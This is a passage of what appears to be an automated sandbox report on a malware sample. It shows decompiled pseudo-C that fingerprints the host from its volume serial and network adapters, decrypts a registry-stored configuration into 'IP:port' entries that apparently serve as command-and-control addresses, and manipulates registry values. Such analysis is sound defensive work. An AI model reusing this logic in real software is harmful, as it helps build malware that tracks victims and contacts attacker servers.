                                                                                                                                                                                                                                                                          				char _v673;
                                                                                                                                                                                                                                                                          				char _v676;
                                                                                                                                                                                                                                                                          				intOrPtr _v680;
                                                                                                                                                                                                                                                                          				long _v684;
                                                                                                                                                                                                                                                                          				signed int _v688;
                                                                                                                                                                                                                                                                          				short* _v692;
                                                                                                                                                                                                                                                                          				signed int _v696;
                                                                                                                                                                                                                                                                          				unsigned int _v700;
                                                                                                                                                                                                                                                                          				intOrPtr _v704;
                                                                                                                                                                                                                                                                          				char _v900;
                                                                                                                                                                                                                                                                          				signed int _v904;
                                                                                                                                                                                                                                                                          				signed int _v908;
                                                                                                                                                                                                                                                                          				int _v912;
                                                                                                                                                                                                                                                                          				int _t71;
                                                                                                                                                                                                                                                                          				void* _t74;
                                                                                                                                                                                                                                                                          				short** _t76;
                                                                                                                                                                                                                                                                          				void* _t114;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v5 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && _a12 > 0) {
                                                                                                                                                                                                                                                                          					_v12 = 0x20;
                                                                                                                                                                                                                                                                          					_v24 = 6;
                                                                                                                                                                                                                                                                          					_v684 = 0;
                                                                                                                                                                                                                                                                          					_v20 = 0;
                                                                                                                                                                                                                                                                          					_v408 = 0;
                                                                                                                                                                                                                                                                          					_v16 = 0x19660d;
                                                                                                                                                                                                                                                                          					_v296 = 0x3c6ef35f;
                                                                                                                                                                                                                                                                          					_v680 = _a4;
                                                                                                                                                                                                                                                                          					if(GetSystemDirectoryA( &_v676, 0x103) != 0) {
                                                                                                                                                                                                                                                                          						_v673 = 0;
                                                                                                                                                                                                                                                                          						_t71 = GetVolumeInformationA( &_v676,  &_v292, 0x103,  &_v684,  &_v20,  &_v408,  &_v404, 0x63); // executed
                                                                                                                                                                                                                                                                          						if(_t71 != 0) {
                                                                                                                                                                                                                                                                          							_v688 = 0xffffffff;
                                                                                                                                                                                                                                                                          							E04007D20(_t71,  &_v900, 0, 0xc0);
                                                                                                                                                                                                                                                                          							_v700 = 0;
                                                                                                                                                                                                                                                                          							_t74 = E04009F70( &_v900, 0xc0,  &_v700); // executed
                                                                                                                                                                                                                                                                          							if(_t74 != 0) {
                                                                                                                                                                                                                                                                          								_v904 = 0;
                                                                                                                                                                                                                                                                          								while(_v904 < _v700 >> 2) {
                                                                                                                                                                                                                                                                          									_v688 = _v688 ^  *(_t114 + _v904 * 4 - 0x380);
                                                                                                                                                                                                                                                                          									_v904 = _v904 + 1;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_v696 = _v684;
                                                                                                                                                                                                                                                                          							_v908 = 0;
                                                                                                                                                                                                                                                                          							while(_v908 < 4) {
                                                                                                                                                                                                                                                                          								 *(_v680 + _v908 * 4) = 0x3c6ef35f + _v696 * 0x0019660d ^ _v688;
                                                                                                                                                                                                                                                                          								_v696 = 0x3c6ef35f + _v696 * 0x19660d;
                                                                                                                                                                                                                                                                          								_v908 = _v908 + 1;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_t76 =  &_v692;
                                                                                                                                                                                                                                                                          							__imp__StringFromCLSID(_a4, _t76); // executed
                                                                                                                                                                                                                                                                          							_v704 = _t76;
                                                                                                                                                                                                                                                                          							if(_v704 >= 0) {
                                                                                                                                                                                                                                                                          								_v912 = WideCharToMultiByte(0, 0, _v692, 0xffffffff, _a8, _a12, 0, 0);
                                                                                                                                                                                                                                                                          								lstrcpynA(_a8,  &(_a8[1]), _v912 - 2);
                                                                                                                                                                                                                                                                          								_v5 = 1;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							__imp__CoTaskMemFree(_v692);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v5;
                                                                                                                                                                                                                                                                          			}





























                                                                                                                                                                                                                                                                          0x04009d29
                                                                                                                                                                                                                                                                          0x04009d31
                                                                                                                                                                                                                                                                          0x04009d4b
                                                                                                                                                                                                                                                                          0x04009d52
                                                                                                                                                                                                                                                                          0x04009d59
                                                                                                                                                                                                                                                                          0x04009d63
                                                                                                                                                                                                                                                                          0x04009d6a
                                                                                                                                                                                                                                                                          0x04009d74
                                                                                                                                                                                                                                                                          0x04009d7b
                                                                                                                                                                                                                                                                          0x04009d88
                                                                                                                                                                                                                                                                          0x04009da2
                                                                                                                                                                                                                                                                          0x04009da8
                                                                                                                                                                                                                                                                          0x04009ddd
                                                                                                                                                                                                                                                                          0x04009de5
                                                                                                                                                                                                                                                                          0x04009deb
                                                                                                                                                                                                                                                                          0x04009e03
                                                                                                                                                                                                                                                                          0x04009e0b
                                                                                                                                                                                                                                                                          0x04009e28
                                                                                                                                                                                                                                                                          0x04009e32
                                                                                                                                                                                                                                                                          0x04009e34
                                                                                                                                                                                                                                                                          0x04009e4f
                                                                                                                                                                                                                                                                          0x04009e73
                                                                                                                                                                                                                                                                          0x04009e49
                                                                                                                                                                                                                                                                          0x04009e49
                                                                                                                                                                                                                                                                          0x04009e4f
                                                                                                                                                                                                                                                                          0x04009e81
                                                                                                                                                                                                                                                                          0x04009e87
                                                                                                                                                                                                                                                                          0x04009ea2
                                                                                                                                                                                                                                                                          0x04009ecf
                                                                                                                                                                                                                                                                          0x04009ee4
                                                                                                                                                                                                                                                                          0x04009e9c
                                                                                                                                                                                                                                                                          0x04009e9c
                                                                                                                                                                                                                                                                          0x04009eec
                                                                                                                                                                                                                                                                          0x04009ef7
                                                                                                                                                                                                                                                                          0x04009efd
                                                                                                                                                                                                                                                                          0x04009f0a
                                                                                                                                                                                                                                                                          0x04009f2b
                                                                                                                                                                                                                                                                          0x04009f46
                                                                                                                                                                                                                                                                          0x04009f4c
                                                                                                                                                                                                                                                                          0x04009f4c
                                                                                                                                                                                                                                                                          0x04009f57
                                                                                                                                                                                                                                                                          0x04009f57
                                                                                                                                                                                                                                                                          0x04009de5
                                                                                                                                                                                                                                                                          0x04009da2
                                                                                                                                                                                                                                                                          0x04009f63

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetSystemDirectoryA.KERNEL32 ref: 04009D9A
                                                                                                                                                                                                                                                                          • GetVolumeInformationA.KERNEL32(?,?,00000103,00000000,00000000,00000000,?,00000063), ref: 04009DDD
                                                                                                                                                                                                                                                                            • Part of subcall function 04009F70: GetAdaptersInfo.IPHLPAPI(00000000,04009E2D), ref: 04009FEB
                                                                                                                                                                                                                                                                          • StringFromCLSID.OLE32(00000020,?), ref: 04009EF7
                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,0019660D,00000000,00000000,00000000), ref: 04009F25
                                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(0019660D,0019660C,?), ref: 04009F46
                                                                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(?), ref: 04009F57
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AdaptersByteCharDirectoryFreeFromInfoInformationMultiStringSystemTaskVolumeWidelstrcpyn
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2697952880-3916222277
                                                                                                                                                                                                                                                                          • Opcode ID: 019f01e5d103752babcd14cd7d8c94bd9c738822c2c1009ff713c67dab5555ec
                                                                                                                                                                                                                                                                          • Instruction ID: 5e89223982a4db5088977870fe710af53f8bde251be69ccbe6f0708d183867dd
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 019f01e5d103752babcd14cd7d8c94bd9c738822c2c1009ff713c67dab5555ec
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 695139B0A043189FEB25CF50CC88BEAB7B9BB44304F14C2D9E5096A281DB74AB84CF51
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04001390(signed int __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                          				signed char* _v8;
                                                                                                                                                                                                                                                                          				char _v12;
                                                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                                                                          				long _v24;
                                                                                                                                                                                                                                                                          				void* _v28;
                                                                                                                                                                                                                                                                          				long _v32;
                                                                                                                                                                                                                                                                          				signed int _t52;
                                                                                                                                                                                                                                                                          				signed int _t57;
                                                                                                                                                                                                                                                                          				intOrPtr _t64;
                                                                                                                                                                                                                                                                          				void* _t76;
                                                                                                                                                                                                                                                                          				void* _t103;
                                                                                                                                                                                                                                                                          				void* _t104;
                                                                                                                                                                                                                                                                          				void* _t106;
                                                                                                                                                                                                                                                                          				void* _t107;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_t52 = __eax;
                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0 || _a4 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                                          					return _t52 | 0xffffffff;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_v24 = 0;
                                                                                                                                                                                                                                                                          					_t57 = RtlAllocateHeap(GetProcessHeap(), 8, _a8 + 5); // executed
                                                                                                                                                                                                                                                                          					_v28 = _t57;
                                                                                                                                                                                                                                                                          					if(_v28 != 0) {
                                                                                                                                                                                                                                                                          						E04007B70(_v28, _a4, _a8);
                                                                                                                                                                                                                                                                          						E04007B70(_v28 + _a8, "====", 4);
                                                                                                                                                                                                                                                                          						_t106 = _t104 + 0x18;
                                                                                                                                                                                                                                                                          						_v8 = _v28;
                                                                                                                                                                                                                                                                          						_v20 = 3;
                                                                                                                                                                                                                                                                          						while(_v20 == 3) {
                                                                                                                                                                                                                                                                          							_v32 = 0;
                                                                                                                                                                                                                                                                          							while(_v32 < 4) {
                                                                                                                                                                                                                                                                          								while( *_v8 != 0x3d) {
                                                                                                                                                                                                                                                                          									_t76 = E04001500( *_v8 & 0x000000ff);
                                                                                                                                                                                                                                                                          									_t106 = _t106 + 4;
                                                                                                                                                                                                                                                                          									if(_t76 >= 0) {
                                                                                                                                                                                                                                                                          										break;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									_v8 =  &(_v8[1]);
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								 *((char*)(_t103 + _v32 - 0xc)) =  *_v8;
                                                                                                                                                                                                                                                                          								_v8 =  &(_v8[1]);
                                                                                                                                                                                                                                                                          								_v32 = _v32 + 1;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_t64 = E04001580( &_v16,  &_v12);
                                                                                                                                                                                                                                                                          							_t107 = _t106 + 8;
                                                                                                                                                                                                                                                                          							_v20 = _t64;
                                                                                                                                                                                                                                                                          							if(_a16 >= _v20) {
                                                                                                                                                                                                                                                                          								E04007B70(_a12,  &_v12, _v20);
                                                                                                                                                                                                                                                                          								_t106 = _t107 + 0xc;
                                                                                                                                                                                                                                                                          								_a12 = _a12 + _v20;
                                                                                                                                                                                                                                                                          								_a16 = _a16 - _v20;
                                                                                                                                                                                                                                                                          								_v24 = _v24 + _v20;
                                                                                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							return HeapFree(GetProcessHeap(), 0, _v28) | 0xffffffff;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						RtlFreeHeap(GetProcessHeap(), 0, _v28); // executed
                                                                                                                                                                                                                                                                          						return _v24;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					return _t57 | 0xffffffff;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}


















                                                                                                                                                                                                                                                                          0x04001390
                                                                                                                                                                                                                                                                          0x0400139a
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040013b6
                                                                                                                                                                                                                                                                          0x040013b6
                                                                                                                                                                                                                                                                          0x040013cd
                                                                                                                                                                                                                                                                          0x040013d3
                                                                                                                                                                                                                                                                          0x040013da
                                                                                                                                                                                                                                                                          0x040013f0
                                                                                                                                                                                                                                                                          0x04001406
                                                                                                                                                                                                                                                                          0x0400140b
                                                                                                                                                                                                                                                                          0x04001411
                                                                                                                                                                                                                                                                          0x04001414
                                                                                                                                                                                                                                                                          0x0400141b
                                                                                                                                                                                                                                                                          0x04001425
                                                                                                                                                                                                                                                                          0x04001437
                                                                                                                                                                                                                                                                          0x0400143d
                                                                                                                                                                                                                                                                          0x0400144f
                                                                                                                                                                                                                                                                          0x04001454
                                                                                                                                                                                                                                                                          0x04001459
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001461
                                                                                                                                                                                                                                                                          0x04001461
                                                                                                                                                                                                                                                                          0x0400146e
                                                                                                                                                                                                                                                                          0x04001478
                                                                                                                                                                                                                                                                          0x04001434
                                                                                                                                                                                                                                                                          0x04001434
                                                                                                                                                                                                                                                                          0x04001485
                                                                                                                                                                                                                                                                          0x0400148a
                                                                                                                                                                                                                                                                          0x0400148d
                                                                                                                                                                                                                                                                          0x04001496
                                                                                                                                                                                                                                                                          0x040014bc
                                                                                                                                                                                                                                                                          0x040014c1
                                                                                                                                                                                                                                                                          0x040014ca
                                                                                                                                                                                                                                                                          0x040014d3
                                                                                                                                                                                                                                                                          0x040014dc
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040014dc
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040014ab
                                                                                                                                                                                                                                                                          0x040014f1
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040014f7
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040013dc

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,-00000005), ref: 040013C6
                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 040013CD
                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0400149E
                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 040014A5
                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 040014EA
                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000), ref: 040014F1
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Heap$Process$Free$Allocate
                                                                                                                                                                                                                                                                          • String ID: ====
                                                                                                                                                                                                                                                                          • API String ID: 168621272-1026985228
                                                                                                                                                                                                                                                                          • Opcode ID: cc6d638cfefe3820553d32bbcecc0cddb825681ad85667f70979d716b4f01239
                                                                                                                                                                                                                                                                          • Instruction ID: c6e28297ba35799b7f22f7dab3aca0fae7ec72587fc4187f79a8e8c8e7655232
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cc6d638cfefe3820553d32bbcecc0cddb825681ad85667f70979d716b4f01239
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F7414CB5D04209EBEB04DFA4C884BEE7BB5FF44309F108619E515BB2D0D735AA45CB92
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 96%
                                                                                                                                                                                                                                                                          			E04007970(intOrPtr* _a4) {
                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                          				int _v16;
                                                                                                                                                                                                                                                                          				long _v20;
                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                          				signed int _v28;
                                                                                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                                                                                          				signed int _v36;
                                                                                                                                                                                                                                                                          				void* _v40;
                                                                                                                                                                                                                                                                          				char _v44;
                                                                                                                                                                                                                                                                          				signed int _v48;
                                                                                                                                                                                                                                                                          				intOrPtr _v52;
                                                                                                                                                                                                                                                                          				void* _t50;
                                                                                                                                                                                                                                                                          				intOrPtr _t52;
                                                                                                                                                                                                                                                                          				void* _t58;
                                                                                                                                                                                                                                                                          				intOrPtr _t64;
                                                                                                                                                                                                                                                                          				intOrPtr _t72;
                                                                                                                                                                                                                                                                          				intOrPtr _t83;
                                                                                                                                                                                                                                                                          				void* _t96;
                                                                                                                                                                                                                                                                          				void* _t97;
                                                                                                                                                                                                                                                                          				void* _t98;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 != 0) {
                                                                                                                                                                                                                                                                          					_v16 = 0x8c;
                                                                                                                                                                                                                                                                          					_v20 = 0x75bc;
                                                                                                                                                                                                                                                                          					_t50 = VirtualAlloc(0, 0x75bc, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                          					_v12 = _t50;
                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                          						_t72 =  *0x400e28c; // 0x4013f88
                                                                                                                                                                                                                                                                          						_t83 =  *0x40118a0; // 0x4013b88
                                                                                                                                                                                                                                                                          						_t52 = E0400A400(_t83, _t72, _v12, 0x75bc); // executed
                                                                                                                                                                                                                                                                          						_t97 = _t96 + 0x10;
                                                                                                                                                                                                                                                                          						_v24 = _t52;
                                                                                                                                                                                                                                                                          						if(_v24 >= 0x92) {
                                                                                                                                                                                                                                                                          							_v28 = _v24 - 0x8c;
                                                                                                                                                                                                                                                                          							_t58 = E04008A70(_v12 + 0x8c,  &_v28, _v12, 0x8c, 0x40130e8, 0x254);
                                                                                                                                                                                                                                                                          							_t98 = _t97 + 0x18;
                                                                                                                                                                                                                                                                          							if(_t58 != 0) {
                                                                                                                                                                                                                                                                          								_v32 = _v12 + 0x8c;
                                                                                                                                                                                                                                                                          								_v36 = _v28 / 6;
                                                                                                                                                                                                                                                                          								_v40 = VirtualAlloc(0, _v36 * 0x28, 0x3000, 4);
                                                                                                                                                                                                                                                                          								if(_v40 != 0) {
                                                                                                                                                                                                                                                                          									_v48 = 0;
                                                                                                                                                                                                                                                                          									while(_v48 < _v36) {
                                                                                                                                                                                                                                                                          										_t64 = E04007B70( &_v44, _v48 * 6 + _v32, 4);
                                                                                                                                                                                                                                                                          										_push(_v44);
                                                                                                                                                                                                                                                                          										L0400B1EC();
                                                                                                                                                                                                                                                                          										_v52 = _t64;
                                                                                                                                                                                                                                                                          										wnsprintfA(_v48 * 0x28 + _v40, 0x28, "%s:%u", _v52,  *(_v32 + 4 + _v48 * 6) & 0x0000ffff);
                                                                                                                                                                                                                                                                          										_t98 = _t98 + 0x20;
                                                                                                                                                                                                                                                                          										_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                          										_v48 = _v48 + 1;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									 *_a4 = _v40;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						VirtualFree(_v12, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                          			}
























                                                                                                                                                                                                                                                                          0x04007976
                                                                                                                                                                                                                                                                          0x04007981
                                                                                                                                                                                                                                                                          0x04007987
                                                                                                                                                                                                                                                                          0x0400798e
                                                                                                                                                                                                                                                                          0x040079a3
                                                                                                                                                                                                                                                                          0x040079a9
                                                                                                                                                                                                                                                                          0x040079b0
                                                                                                                                                                                                                                                                          0x040079bf
                                                                                                                                                                                                                                                                          0x040079c6
                                                                                                                                                                                                                                                                          0x040079cd
                                                                                                                                                                                                                                                                          0x040079d2
                                                                                                                                                                                                                                                                          0x040079d5
                                                                                                                                                                                                                                                                          0x040079df
                                                                                                                                                                                                                                                                          0x040079ed
                                                                                                                                                                                                                                                                          0x04007a10
                                                                                                                                                                                                                                                                          0x04007a15
                                                                                                                                                                                                                                                                          0x04007a1a
                                                                                                                                                                                                                                                                          0x04007a29
                                                                                                                                                                                                                                                                          0x04007a38
                                                                                                                                                                                                                                                                          0x04007a51
                                                                                                                                                                                                                                                                          0x04007a58
                                                                                                                                                                                                                                                                          0x04007a5a
                                                                                                                                                                                                                                                                          0x04007a6c
                                                                                                                                                                                                                                                                          0x04007a84
                                                                                                                                                                                                                                                                          0x04007a8f
                                                                                                                                                                                                                                                                          0x04007a90
                                                                                                                                                                                                                                                                          0x04007a95
                                                                                                                                                                                                                                                                          0x04007abc
                                                                                                                                                                                                                                                                          0x04007ac2
                                                                                                                                                                                                                                                                          0x04007acb
                                                                                                                                                                                                                                                                          0x04007a69
                                                                                                                                                                                                                                                                          0x04007a69
                                                                                                                                                                                                                                                                          0x04007ad6
                                                                                                                                                                                                                                                                          0x04007ad6
                                                                                                                                                                                                                                                                          0x04007a58
                                                                                                                                                                                                                                                                          0x04007a1a
                                                                                                                                                                                                                                                                          0x04007ae3
                                                                                                                                                                                                                                                                          0x04007ae3
                                                                                                                                                                                                                                                                          0x040079b0
                                                                                                                                                                                                                                                                          0x04007aef

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,000075BC,00003000,00000004), ref: 040079A3
                                                                                                                                                                                                                                                                            • Part of subcall function 0400A400: RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,000F003F,00000000), ref: 0400A45C
                                                                                                                                                                                                                                                                            • Part of subcall function 0400A400: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0400A480
                                                                                                                                                                                                                                                                            • Part of subcall function 0400A400: RegCloseKey.KERNEL32(00000000), ref: 0400A494
                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04007AE3
                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 04008AD3
                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: GetLastError.KERNEL32 ref: 04008ADD
                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008B0C
                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00000000), ref: 04008B37
                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 04008B5E
                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 04008B7A
                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptDestroyKey.ADVAPI32(00000000), ref: 04008B87
                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptDestroyKey.ADVAPI32(00000000), ref: 04008B91
                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008B9D
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 04007A4B
                                                                                                                                                                                                                                                                          • inet_ntoa.WS2_32(?), ref: 04007A90
                                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 04007ABC
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Crypt$ContextVirtual$AcquireAllocDestroyImport$CloseDecryptErrorFreeLastOpenQueryReleaseValueinet_ntoawnsprintf
                                                                                                                                                                                                                                                                          • String ID: %s:%u$Kobucgekyxca
                                                                                                                                                                                                                                                                          • API String ID: 1891311255-965644793
                                                                                                                                                                                                                                                                          • Opcode ID: 79f967d1a52c2aaee155b9d7bfa010675069804c64fe547678c39a65b43ec606
                                                                                                                                                                                                                                                                          • Instruction ID: d327848a4ae889dd371e71d646ee9b038911c4fd72f1be7e57aa30bfb263aa34
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 79f967d1a52c2aaee155b9d7bfa010675069804c64fe547678c39a65b43ec606
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C410FB5E04208EBFB04DF94C945BEEBBB5EB88705F14C159E6057B2C0D779AA40CB64
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04005E30(signed char _a4) {
                                                                                                                                                                                                                                                                          				char* _v8;
                                                                                                                                                                                                                                                                          				char _v9;
                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                                                                          				char* _v24;
                                                                                                                                                                                                                                                                          				int _v28;
                                                                                                                                                                                                                                                                          				signed int _v29;
                                                                                                                                                                                                                                                                          				int _v36;
                                                                                                                                                                                                                                                                          				char _v68;
                                                                                                                                                                                                                                                                          				int _v72;
                                                                                                                                                                                                                                                                          				char* _t31;
                                                                                                                                                                                                                                                                          				long _t33;
                                                                                                                                                                                                                                                                          				long _t37;
                                                                                                                                                                                                                                                                          				char* _t45;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v9 = 0;
                                                                                                                                                                                                                                                                          				_t31 =  *0x40118a0; // 0x4013b88
                                                                                                                                                                                                                                                                          				_v8 = _t31;
                                                                                                                                                                                                                                                                          				_t45 =  *0x4011894; // 0x4013fc4
                                                                                                                                                                                                                                                                          				_v24 = _t45;
                                                                                                                                                                                                                                                                          				_v16 = 0x80000001;
                                                                                                                                                                                                                                                                          				if(( *0x401435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          					_v16 = 0x80000002;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				_v20 = 0;
                                                                                                                                                                                                                                                                          				_t33 = RegOpenKeyExA(_v16, _v8, 0, 0xf003f,  &_v20); // executed
                                                                                                                                                                                                                                                                          				if(_t33 == 0) {
                                                                                                                                                                                                                                                                          					_v36 = 0x20;
                                                                                                                                                                                                                                                                          					_v28 = 0x20;
                                                                                                                                                                                                                                                                          					_v29 = 0;
                                                                                                                                                                                                                                                                          					_t37 = RegQueryValueExA(_v20, _v24, 0, 0,  &_v68,  &_v28); // executed
                                                                                                                                                                                                                                                                          					if(_t37 == 0 && _v28 == 0x10) {
                                                                                                                                                                                                                                                                          						_v29 = 1;
                                                                                                                                                                                                                                                                          						if((_a4 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          							RegDeleteValueA(_v20, _v24);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
